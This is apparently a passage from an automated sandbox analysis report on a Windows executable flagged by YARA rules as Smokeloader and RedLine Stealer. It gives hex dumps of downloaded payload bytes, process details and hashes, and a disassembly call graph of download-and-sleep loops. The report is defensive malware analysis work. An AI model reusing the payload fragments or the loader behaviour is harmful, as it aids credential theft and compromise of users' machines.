                                          Dec 13, 2024 08:36:33.419744968 CET1236INData Raw: 11 00 00 04 72 6d 05 00 70 6f 42 00 00 0a 02 7b 11 00 00 04 20 96 00 00 00 1f 2a 73 43 00 00 0a 6f 44 00 00 0a 02 7b 11 00 00 04 1f 0b 6f 45 00 00 0a 02 7b 11 00 00 04 72 93 05 00 70 6f 21 00 00 0a 02 7b 11 00 00 04 02 fe 06 17 00 00 06 73 67 00
                                          Data Ascii: rmpoB{ *sCoD{oE{rpo!{sgoh{oi{r5p"dAsOoP{zs>o?{s@oA{rpoB{ *sCoD{oE{rpo!{
                                          Dec 13, 2024 08:36:33.419750929 CET1236INData Raw: 72 35 02 00 70 22 00 00 7c 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 15 00 00 04 28 46 00 00 0a 6f 3d 00 00 0a 02 7b 15 00 00 04 17 6f 85 00 00 0a 02 7b 15 00 00 04 1f 14 6f 86 00 00 0a 02 7b 15 00 00 04 28 3c 00 00 0a 6f 87 00 00 0a 02 7b
                                          Data Ascii: r5p"|AsOoP{(Fo={o{o{(<o{(Fo{(Fo{ ?s>o?{s@oA{rpoB{ jmsCoD{oE{ o{sg
                                          Dec 13, 2024 08:36:33.419756889 CET1236INData Raw: 7b 1d 00 00 04 6f 3a 00 00 0a 02 7b 20 00 00 04 6f 3b 00 00 0a 02 7b 1d 00 00 04 28 3c 00 00 0a 6f 3d 00 00 0a 02 7b 1d 00 00 04 1f f8 1f f5 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 1d 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1d 00 00
                                          Data Ascii: {o:{ o;{(<o={s>o?{s@oA{rGpoB{ sCoD{oE{)skol{oi{rUp"@AsOoP{Ss>o?{s@oA{rw
                                          Dec 13, 2024 08:36:33.419934034 CET1236INData Raw: 04 17 6f 59 00 00 0a 02 7b 27 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 27 00 00 04 17 6f 5b 00 00 0a 02 7b 27 00 00 04 23 00 00 00 00 00 80 56 40 6f 5c 00 00 0a 02 7b 27 00 00 04 16 6f 5d 00 00 0a 02 7b 27 00 00 04 1f 09 20 f5 00
                                          Data Ascii: oY{'#oZ{'o[{'#V@o\{'o]{' s>o?{'s@oA{'rpoB{'(<o^{'(_o`{'(aob{'oc{' AUsCoD{'oE{'rpo!{
                                          Dec 13, 2024 08:36:33.419940948 CET1236INData Raw: 00 04 14 6f 56 00 00 0a 02 7b 25 00 00 04 16 6f 57 00 00 0a 02 7b 25 00 00 04 16 6f 58 00 00 0a 02 7b 25 00 00 04 17 6f 59 00 00 0a 02 7b 25 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 25 00 00 04 17 6f 5b 00 00 0a 02 7b 25 00 00 04
                                          Data Ascii: oV{%oW{%oX{%oY{%#oZ{%o[{%#V@o\{%o]{% s>o?{%s@oA{%rpoB{%(_o^{%(_o`{%(aob{%oc{% AUsC
                                          Dec 13, 2024 08:36:33.545064926 CET1236INData Raw: 20 96 00 00 00 20 2a 01 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 2a 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 2a 00 00 04 72 91 07 00 70 6f 42 00 00 0a 02 7b 2a 00 00 04 20 74 02 00 00 1f 1a 73 43 00 00 0a 6f 44 00 00 0a 02 7b 2a
                                          Data Ascii: *s>o?{*s@oA{*rpoB{* tsCoD{*oE{)oi{)rp"@A sOoP{) e s>o?{)s@oA{)rpoB{) sCoD{)oE{)r


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:35:22
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x400000
                                          File size:1'979'904 bytes
                                          MD5 hash:CFC94B958CBA743ED8B273401E37C465
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:02:36:35
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 580
                                          Imagebase:0x860000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:4%
                                            Dynamic/Decrypted Code Coverage:10.6%
                                            Signature Coverage:57.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:22
                                            execution_graph 40053 401940 40054 4019af InternetSetFilePointer InternetReadFile 40053->40054 40055 401a50 CallUnexpected 40054->40055 40056 401a7a HttpQueryInfoA 40055->40056 40057 401aa3 CoCreateInstance 40056->40057 40058 401dea 40056->40058 40057->40058 40061 401adc 40057->40061 40122 4099d7 40058->40122 40060 401e13 40061->40058 40086 402730 40061->40086 40063 401b2c 40064 401c05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40063->40064 40065 401e19 40063->40065 40072 401d8c __InternalCxxFrameHandler 40064->40072 40102 409b4a 40064->40102 40129 40cfaf 40065->40129 40069 401c3b 40070 409b4a 41 API calls 40069->40070 40069->40072 40073 401cf3 __InternalCxxFrameHandler 40069->40073 40077 401cc7 CallUnexpected 40070->40077 40071 401d7b 40119 40d09d 14 API calls __dosmaperr 40071->40119 40072->40058 40073->40071 40073->40072 40076 401d88 CallUnexpected 40073->40076 40075 401d80 40121 40cf9f 39 API calls __cftof 40075->40121 40076->40072 40120 40d09d 14 API calls __dosmaperr 40076->40120 40077->40073 40080 401d2c 40077->40080 40081 401d1f 40077->40081 40080->40073 40117 40d09d 14 API calls __dosmaperr 40080->40117 40116 40d09d 14 API calls __dosmaperr 40081->40116 40083 401d24 40118 40cf9f 39 API calls __cftof 40083->40118 40087 402800 40086->40087 40088 40274f 40086->40088 40136 4015d0 43 API calls 3 library calls 40087->40136 40089 40275b __InternalCxxFrameHandler 40088->40089 40091 402783 40088->40091 40094 4027c7 40088->40094 40095 4027be 40088->40095 40089->40063 40134 401530 41 API calls 3 library calls 40091->40134 40092 402805 40137 401530 41 API calls 2 library calls 40092->40137 40100 40279f __InternalCxxFrameHandler 40094->40100 40135 401530 41 API calls 3 library calls 40094->40135 40095->40091 40095->40092 40097 402796 40098 40cfaf 39 API calls 40097->40098 40097->40100 40101 40280f 40098->40101 40100->40063 40104 409b0c 40102->40104 40105 409b2b 40104->40105 40107 409b2d 40104->40107 40140 411672 EnterCriticalSection LeaveCriticalSection _unexpected 40104->40140 40141 40fb0d 40104->40141 40105->40069 40108 401530 Concurrency::cancel_current_task 40107->40108 40110 409b37 40107->40110 40138 40af40 RaiseException 40108->40138 40148 40af40 RaiseException 40110->40148 40111 40154c 40139 40acf1 40 API calls ___std_exception_copy 40111->40139 40113 40a549 40115 401573 40115->40069 40116->40083 40117->40083 40118->40073 40119->40075 40120->40075 40121->40072 40123 4099e0 IsProcessorFeaturePresent 40122->40123 40124 4099df 40122->40124 40126 409a27 40123->40126 40124->40060 40151 4099ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40126->40151 40128 409b0a 40128->40060 40152 40ceeb 39 API calls __cftof 40129->40152 40131 40cfbe 40153 40cfcc 11 API calls CallUnexpected 40131->40153 40133 40cfcb 40134->40097 40135->40100 40136->40092 40137->40097 40138->40111 40139->40115 40140->40104 40146 413c79 _unexpected 40141->40146 40142 413cb7 40150 40d09d 14 API calls __dosmaperr 40142->40150 40144 413ca2 RtlAllocateHeap 40145 413cb5 40144->40145 40144->40146 40145->40104 40146->40142 40146->40144 40149 411672 EnterCriticalSection LeaveCriticalSection _unexpected 40146->40149 40148->40113 40149->40146 40150->40145 40151->40128 40152->40131 40153->40133 40154 40a071 40155 40a07d ___scrt_is_nonwritable_in_current_image 40154->40155 40182 409dd1 40155->40182 40157 40a084 40158 40a1d7 40157->40158 40166 40a0ae ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 40157->40166 40210 40a54a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 40158->40210 40160 40a1de 40211 41066b 40160->40211 40164 40a1ec 40165 40a0cd 40166->40165 40167 40a14e 40166->40167 40206 410645 39 API calls 3 library calls 40166->40206 40190 40a665 40167->40190 40183 409dda 40182->40183 40215 40a2ac IsProcessorFeaturePresent 40183->40215 40185 409de6 40216 40b73d 10 API calls 2 library calls 40185->40216 40187 409deb 40189 409def 40187->40189 40217 40b75c 7 API calls 2 library calls 40187->40217 40189->40157 40218 40b530 40190->40218 40193 40a154 40194 412248 40193->40194 40220 41812d 40194->40220 40196 40a15c 40199 408770 40196->40199 40198 412251 40198->40196 40226 4183dd 39 API calls 40198->40226 40200 402730 43 API calls 40199->40200 40201 4087a5 40200->40201 40202 402730 43 API calls 40201->40202 40203 4087ca 40202->40203 40229 405a30 40203->40229 40206->40167 40210->40160 42698 41049f 40211->42698 40214 41062f 21 API calls CallUnexpected 40214->40164 40215->40185 40216->40187 40217->40189 40219 40a678 GetStartupInfoW 40218->40219 40219->40193 40221 418136 40220->40221 40225 418168 40220->40225 40227 41295d 39 API calls 3 library calls 40221->40227 40223 418159 40228 417f38 49 API calls 3 library calls 40223->40228 40225->40198 40226->40198 40227->40223 40228->40225 40660 4107e2 GetSystemTimeAsFileTime 40229->40660 40231 405a7f 40662 4106a2 40231->40662 40234 402730 43 API calls 40240 405aba 40234->40240 40235 402730 43 API calls 40269 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40235->40269 40236 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40236->40235 40236->40269 40238 40cfaf 39 API calls 40238->40269 40240->40236 41826 4025a0 41 API calls 40240->41826 40243 409b4a 41 API calls 40243->40269 40244 4061c5 40681 406c20 40244->40681 40246 4061ec 40691 402430 40246->40691 40248 402730 43 API calls 40248->40269 40251 4061fc 40695 402360 40251->40695 40255 406210 40256 4062e5 40255->40256 40257 406218 40255->40257 41864 406ec0 53 API calls 2 library calls 40256->41864 40261 406288 40257->40261 40262 40622b 40257->40262 40260 4062ea 40267 402430 43 API calls 40260->40267 41859 406db0 53 API calls 2 library calls 40261->41859 41854 406ca0 53 API calls 2 library calls 40262->41854 40263 406192 Sleep 40263->40269 40266 40628d 40271 402430 43 API calls 40266->40271 40270 4062fa 40267->40270 40268 406230 40272 402430 43 API calls 40268->40272 40269->40238 40269->40243 40269->40244 40269->40248 40269->40263 40273 40619e 40269->40273 40281 406c0b 40269->40281 40282 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40269->40282 40665 4107b2 40269->40665 40669 403a90 40269->40669 41827 4025a0 41 API calls 40269->41827 41828 409c85 6 API calls 40269->41828 41829 409f97 42 API calls 40269->41829 41830 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40269->41830 41831 4092d0 40269->41831 41836 401e20 40269->41836 40275 402360 39 API calls 40270->40275 40274 40629d 40271->40274 40276 406240 40272->40276 41852 408c10 43 API calls 40273->41852 41860 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40274->41860 40278 40630e 40275->40278 41855 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40276->41855 40284 4063e4 40278->40284 40285 406316 40278->40285 41929 403c20 40281->41929 40282->40263 40283 4062a6 40290 402360 39 API calls 40283->40290 41873 407260 53 API calls 2 library calls 40284->41873 41865 406f40 53 API calls 2 library calls 40285->41865 40286 4061aa 40292 402360 39 API calls 40286->40292 40287 406249 40288 402360 39 API calls 40287->40288 40294 406251 40288->40294 40296 4062ae 40290->40296 40298 4061b2 40292->40298 41856 406d30 53 API calls 2 library calls 40294->41856 41861 406e40 53 API calls 2 library calls 40296->41861 40297 40631b 40308 402430 43 API calls 40297->40308 40302 402360 39 API calls 40298->40302 40299 4063e9 40307 402430 43 API calls 40299->40307 40303 4061ba 40302->40303 41853 4017d0 CoUninitialize 40303->41853 40304 406256 40312 402430 43 API calls 40304->40312 40305 4062b3 40313 402430 43 API calls 40305->40313 40309 4063f9 40307->40309 40310 40632b 40308->40310 40318 402360 39 API calls 40309->40318 41866 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40310->41866 40315 406266 40312->40315 40316 4062c3 40313->40316 40314 406334 40317 402360 39 API calls 40314->40317 41857 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40315->41857 41862 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40316->41862 40322 40633c 40317->40322 40323 40640d 40318->40323 40321 4062cc 40325 402360 39 API calls 40321->40325 41867 406fc0 53 API calls 2 library calls 40322->41867 40327 4064ce 40323->40327 41874 4072e0 53 API calls 2 library calls 40323->41874 40324 40626f 40328 402360 39 API calls 40324->40328 40329 4062d4 40325->40329 41882 407600 53 API calls 2 library calls 40327->41882 40333 406277 40328->40333 41863 408c10 43 API calls 40329->41863 40330 406341 40339 402430 43 API calls 40330->40339 41858 408c10 43 API calls 40333->41858 40335 40641a 40342 402430 43 API calls 40335->40342 40336 4064d8 40343 402430 43 API calls 40336->40343 40338 406283 40340 40686e 40338->40340 41920 402330 43 API calls 40338->41920 40341 406351 40339->40341 40703 401770 40340->40703 41868 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40341->41868 40347 40642a 40342->40347 40348 4064e8 40343->40348 41875 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40347->41875 40356 402360 39 API calls 40348->40356 40349 406881 40707 408380 40349->40707 40350 40635a 40354 402360 39 API calls 40350->40354 40352 406433 40355 402360 39 API calls 40352->40355 40358 406362 40354->40358 40359 40643b 40355->40359 40360 4064fc 40356->40360 40357 40688a 40368 402430 43 API calls 40357->40368 41869 407040 53 API calls 2 library calls 40358->41869 41876 407360 53 API calls 2 library calls 40359->41876 40363 4065e3 40360->40363 41883 407680 53 API calls 2 library calls 40360->41883 41893 407a20 53 API calls 2 library calls 40363->41893 40364 406367 40373 402430 43 API calls 40364->40373 40366 406440 40376 402430 43 API calls 40366->40376 40369 40689d 40368->40369 40717 408300 40369->40717 40370 4065ed 40377 402430 43 API calls 40370->40377 40371 406509 40379 402430 43 API calls 40371->40379 40375 406377 40373->40375 40374 4068a8 40383 402430 43 API calls 40374->40383 40384 402360 39 API calls 40375->40384 40378 406450 40376->40378 40380 4065fd 40377->40380 41877 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40378->41877 40382 406519 40379->40382 40394 402360 39 API calls 40380->40394 41884 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40382->41884 40387 4068bb 40383->40387 40388 40638b 40384->40388 40385 406459 40389 402360 39 API calls 40385->40389 40727 408260 40387->40727 40392 4063ac 40388->40392 40393 40638f 40388->40393 40395 406461 40389->40395 40390 406522 40396 402360 39 API calls 40390->40396 41871 407150 53 API calls 2 library calls 40392->41871 41870 4070d0 53 API calls 2 library calls 40393->41870 40400 406611 40394->40400 41878 4073e0 53 API calls 2 library calls 40395->41878 40402 40652a 40396->40402 40398 4068c6 40412 402430 43 API calls 40398->40412 40405 406693 40400->40405 40406 406615 40400->40406 41885 407700 53 API calls 2 library calls 40402->41885 40403 4063b1 40416 402430 43 API calls 40403->40416 40404 406394 40418 402430 43 API calls 40404->40418 41900 407c40 53 API calls 2 library calls 40405->41900 41894 407ab0 53 API calls 2 library calls 40406->41894 40407 406466 40415 402430 43 API calls 40407->40415 40409 40652f 40420 402430 43 API calls 40409->40420 40417 4068d9 40412->40417 40413 406698 40427 402430 43 API calls 40413->40427 40414 40661a 40424 402430 43 API calls 40414->40424 40419 406476 40415->40419 40421 4063c1 40416->40421 40737 408d60 40417->40737 40423 4063a4 40418->40423 40435 402360 39 API calls 40419->40435 40425 40653f 40420->40425 40437 402360 39 API calls 40421->40437 41919 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40423->41919 40429 40662a 40424->40429 41886 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40425->41886 40428 4066a8 40427->40428 40446 402360 39 API calls 40428->40446 41895 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40429->41895 40433 406906 40745 408e70 40433->40745 40441 40648a 40435->40441 40436 406548 40442 402360 39 API calls 40436->40442 40443 4063d5 40437->40443 40438 406855 40438->40338 40444 402360 39 API calls 40438->40444 40440 406633 40447 402360 39 API calls 40440->40447 40448 406498 40441->40448 40449 40648e 40441->40449 40450 406550 40442->40450 40443->40338 41872 4071e0 53 API calls 2 library calls 40443->41872 40444->40338 40452 4066bc 40446->40452 40453 40663b 40447->40453 41880 4074f0 53 API calls 2 library calls 40448->41880 41879 407470 53 API calls 2 library calls 40449->41879 41887 407780 53 API calls 2 library calls 40450->41887 40451 408dc0 43 API calls 40458 406933 40451->40458 40459 4066c0 40452->40459 40460 40673e 40452->40460 41896 407b30 53 API calls 2 library calls 40453->41896 40464 408e70 43 API calls 40458->40464 41901 407cd0 53 API calls 2 library calls 40459->41901 41907 407e50 53 API calls 2 library calls 40460->41907 40462 406555 40472 402430 43 API calls 40462->40472 40463 40649d 40473 402430 43 API calls 40463->40473 40468 406948 40464->40468 40467 406640 40476 402430 43 API calls 40467->40476 40471 408dc0 43 API calls 40468->40471 40469 406743 40479 402430 43 API calls 40469->40479 40470 4066c5 40480 402430 43 API calls 40470->40480 40475 406960 40471->40475 40477 406565 40472->40477 40474 4064ad 40473->40474 40489 402360 39 API calls 40474->40489 40478 402360 39 API calls 40475->40478 40481 406650 40476->40481 41888 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40477->41888 40484 40696e 40478->40484 40485 406753 40479->40485 40486 4066d5 40480->40486 41897 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40481->41897 40483 40656e 40488 402360 39 API calls 40483->40488 40490 402360 39 API calls 40484->40490 40500 402360 39 API calls 40485->40500 41902 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40486->41902 40493 406576 40488->40493 40494 4064c1 40489->40494 40495 406979 40490->40495 40492 406659 40497 402360 39 API calls 40492->40497 41889 407800 53 API calls 2 library calls 40493->41889 40494->40338 41881 407580 53 API calls 2 library calls 40494->41881 40499 402360 39 API calls 40495->40499 40496 4066de 40501 402360 39 API calls 40496->40501 40502 406661 40497->40502 40506 406984 40499->40506 40507 406767 40500->40507 40508 4066e6 40501->40508 41898 407bc0 53 API calls 2 library calls 40502->41898 40504 40657b 40520 402430 43 API calls 40504->40520 40511 402360 39 API calls 40506->40511 40512 40676b 40507->40512 40513 4067be 40507->40513 41903 407d50 53 API calls 2 library calls 40508->41903 40510 406666 40523 402430 43 API calls 40510->40523 40514 40698f 40511->40514 41908 407ee0 53 API calls 2 library calls 40512->41908 41913 408060 53 API calls 2 library calls 40513->41913 40518 402360 39 API calls 40514->40518 40516 4066eb 40526 402430 43 API calls 40516->40526 40522 40699a 40518->40522 40519 406770 40529 402430 43 API calls 40519->40529 40524 40658b 40520->40524 40521 4067c3 40532 402430 43 API calls 40521->40532 40525 402360 39 API calls 40522->40525 40527 406676 40523->40527 40537 402360 39 API calls 40524->40537 40528 4069a5 40525->40528 40530 4066fb 40526->40530 41899 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40527->41899 40533 402360 39 API calls 40528->40533 40534 406780 40529->40534 41904 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40530->41904 40538 4067d3 40532->40538 40539 4069b0 40533->40539 41909 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40534->41909 40536 40667f 40542 402360 39 API calls 40536->40542 40543 40659f 40537->40543 40552 402360 39 API calls 40538->40552 40544 402360 39 API calls 40539->40544 40541 406704 40546 402360 39 API calls 40541->40546 40542->40338 40547 4065a8 40543->40547 41890 407890 53 API calls 2 library calls 40543->41890 40587 4069bf 40544->40587 40545 406789 40549 402360 39 API calls 40545->40549 40550 40670c 40546->40550 41891 407910 53 API calls 2 library calls 40547->41891 40555 406791 40549->40555 41905 407dd0 53 API calls 2 library calls 40550->41905 40553 4067e7 40552->40553 40553->40338 41914 4080e0 53 API calls 2 library calls 40553->41914 40554 4065b2 40562 402430 43 API calls 40554->40562 41910 407f60 53 API calls 2 library calls 40555->41910 40558 406711 40564 402430 43 API calls 40558->40564 40560 406796 40566 402430 43 API calls 40560->40566 40561 4067f0 40569 402430 43 API calls 40561->40569 40563 4065c2 40562->40563 40574 402360 39 API calls 40563->40574 40567 406721 40564->40567 40565 406a1e Sleep 40565->40587 40570 4067a6 40566->40570 41906 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40567->41906 40573 406800 40569->40573 41911 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40570->41911 40572 40672a 40577 402360 39 API calls 40572->40577 41915 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40573->41915 40579 4065d6 40574->40579 40575 402430 43 API calls 40575->40587 40576 4067af 40580 402360 39 API calls 40576->40580 40577->40338 40579->40338 41892 4079a0 53 API calls 2 library calls 40579->41892 40582 4067b7 40580->40582 40581 406809 40583 402360 39 API calls 40581->40583 41912 407fe0 53 API calls 2 library calls 40582->41912 40586 406811 40583->40586 41916 408160 53 API calls 2 library calls 40586->41916 40587->40565 40587->40575 40588 406a27 40587->40588 40593 406a16 40587->40593 40590 402360 39 API calls 40588->40590 40592 406a2f 40590->40592 40591 406816 40596 402430 43 API calls 40591->40596 40748 408c40 40592->40748 40597 402360 39 API calls 40593->40597 40594 4067bc 40598 402430 43 API calls 40594->40598 40601 406826 40596->40601 40597->40565 40598->40423 40599 406a40 40600 408c40 43 API calls 40599->40600 40602 406a59 40600->40602 41917 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40601->41917 40604 408c40 43 API calls 40602->40604 40606 406a6c 40604->40606 40605 40682f 40607 402360 39 API calls 40605->40607 40765 404f50 40606->40765 40609 406837 40607->40609 41918 4081e0 53 API calls 2 library calls 40609->41918 40610 406a81 40612 406aa1 40610->40612 40613 408c40 43 API calls 40610->40613 41921 408410 53 API calls 2 library calls 40612->41921 40615 406a9c 40613->40615 41248 403d20 40615->41248 40616 406aa9 40618 402430 43 API calls 40616->40618 40619 406ab9 40618->40619 40620 402360 39 API calls 40619->40620 40621 406acd 40620->40621 40622 406b70 40621->40622 40624 401770 41 API calls 40621->40624 41924 408580 53 API calls 2 library calls 40622->41924 40626 406ae8 40624->40626 40625 406b75 40629 402430 43 API calls 40625->40629 41922 4084a0 53 API calls 2 library calls 40626->41922 40628 406af1 40631 402430 43 API calls 40628->40631 40630 406b88 40629->40630 40632 402360 39 API calls 40630->40632 40634 406b01 40631->40634 40633 406b9f 40632->40633 40633->40281 40635 406ba3 40633->40635 40638 406b37 40634->40638 40639 406b28 Sleep 40634->40639 41925 4086f0 53 API calls 2 library calls 40635->41925 40637 406bb0 40641 402430 43 API calls 40637->40641 40644 402430 43 API calls 40638->40644 40639->40634 40640 406b35 40639->40640 40642 406b59 40640->40642 40643 406bbf 40641->40643 40645 402360 39 API calls 40642->40645 41926 408670 53 API calls 2 library calls 40643->41926 40647 406b4e 40644->40647 40648 406b61 40645->40648 40650 402360 39 API calls 40647->40650 41923 4017d0 CoUninitialize 40648->41923 40649 406bd3 40652 402430 43 API calls 40649->40652 40650->40642 40653 406be2 40652->40653 41927 408610 53 API calls __Init_thread_footer 40653->41927 40655 406bf0 40656 402430 43 API calls 40655->40656 40657 406bff 40656->40657 41928 4058d0 242 API calls 5 library calls 40657->41928 40659 406c08 40659->40281 40661 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40660->40661 40661->40231 41932 4128a2 GetLastError 40662->41932 40666 4107c0 40665->40666 40667 4107ca 40665->40667 41976 4106b4 43 API calls 2 library calls 40666->41976 40667->40269 40680 403ad1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40669->40680 40670 408c40 43 API calls 40670->40680 40671 4099d7 CatchGuardHandler 5 API calls 40673 403c13 40671->40673 40673->40269 40674 403b6d 40675 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40674->40675 40676 403c17 40674->40676 40675->40671 40678 40cfaf 39 API calls 40676->40678 40677 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40677->40675 40677->40676 41977 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40677->41977 40679 403c1c 40678->40679 40680->40670 40680->40676 40680->40677 40682 406c4c 40681->40682 40690 406c7e 40681->40690 41978 409c85 6 API calls 40682->41978 40683 4099d7 CatchGuardHandler 5 API calls 40685 406c90 40683->40685 40685->40246 40686 406c56 40686->40690 41979 409f97 42 API calls 40686->41979 40688 406c74 41980 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40688->41980 40690->40683 40692 402453 40691->40692 40692->40692 40693 402730 43 API calls 40692->40693 40694 402465 40693->40694 40694->40251 40696 40236b 40695->40696 40697 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40695->40697 40696->40697 40698 40cfaf 39 API calls 40696->40698 40697->40255 40700 4023aa 40698->40700 40699 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40699->40255 40700->40699 40701 40cfaf 39 API calls 40700->40701 40702 40242c 40701->40702 40704 401783 CallUnexpected 40703->40704 40705 409b4a 41 API calls 40704->40705 40706 40179a CallUnexpected 40705->40706 40706->40349 40708 4083b2 40707->40708 40716 4083ee 40707->40716 41981 409c85 6 API calls 40708->41981 40710 4099d7 CatchGuardHandler 5 API calls 40712 408400 40710->40712 40711 4083bc 40711->40716 41982 409f97 42 API calls 40711->41982 40712->40357 40714 4083e4 41983 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40714->41983 40716->40710 40718 40832c 40717->40718 40726 40835e 40717->40726 41984 409c85 6 API calls 40718->41984 40720 4099d7 CatchGuardHandler 5 API calls 40722 408370 40720->40722 40721 408336 40721->40726 41985 409f97 42 API calls 40721->41985 40722->40374 40724 408354 41986 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40724->41986 40726->40720 40728 40829d 40727->40728 40736 4082e2 40727->40736 41987 409c85 6 API calls 40728->41987 40729 4099d7 CatchGuardHandler 5 API calls 40731 4082f5 40729->40731 40731->40398 40732 4082a7 40732->40736 41988 409f97 42 API calls 40732->41988 40734 4082d8 41989 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40734->41989 40736->40729 40738 408d74 40737->40738 40739 4092d0 43 API calls 40738->40739 40740 4068ee 40739->40740 40741 408dc0 40740->40741 40742 408ddb 40741->40742 40743 408def __InternalCxxFrameHandler 40742->40743 41990 402810 43 API calls 3 library calls 40742->41990 40743->40433 41991 4090f0 40745->41991 40747 40691b 40747->40451 40749 408c6a 40748->40749 40750 408d2d 40749->40750 40754 408c7e 40749->40754 42014 4015d0 43 API calls 3 library calls 40750->42014 40752 408c8a __InternalCxxFrameHandler 40752->40599 40753 408d32 42015 401530 41 API calls 2 library calls 40753->42015 40754->40752 40756 408cd8 40754->40756 40757 408cf9 40754->40757 40756->40753 40758 408cdf 40756->40758 40764 408cee __InternalCxxFrameHandler 40757->40764 42013 401530 41 API calls 3 library calls 40757->42013 42012 401530 41 API calls 3 library calls 40758->42012 40759 40cfaf 39 API calls 40761 408d3c 40759->40761 40763 408ce5 40763->40759 40763->40764 40764->40599 40766 4107e2 GetSystemTimeAsFileTime 40765->40766 40767 404f9f 40766->40767 40768 4106a2 39 API calls 40767->40768 40769 404fa8 CallUnexpected 40768->40769 40770 409b4a 41 API calls 40769->40770 40777 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40770->40777 40772 402730 43 API calls 40772->40777 40774 4092d0 43 API calls 40774->40777 40776 401e20 44 API calls 40776->40777 40777->40772 40777->40774 40777->40776 40778 4052d0 Sleep 40777->40778 40779 4058bd 40777->40779 40787 4052e0 CallUnexpected 40777->40787 42016 402470 40777->42016 42157 409c85 6 API calls 40777->42157 42158 409f97 42 API calls 40777->42158 42159 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent 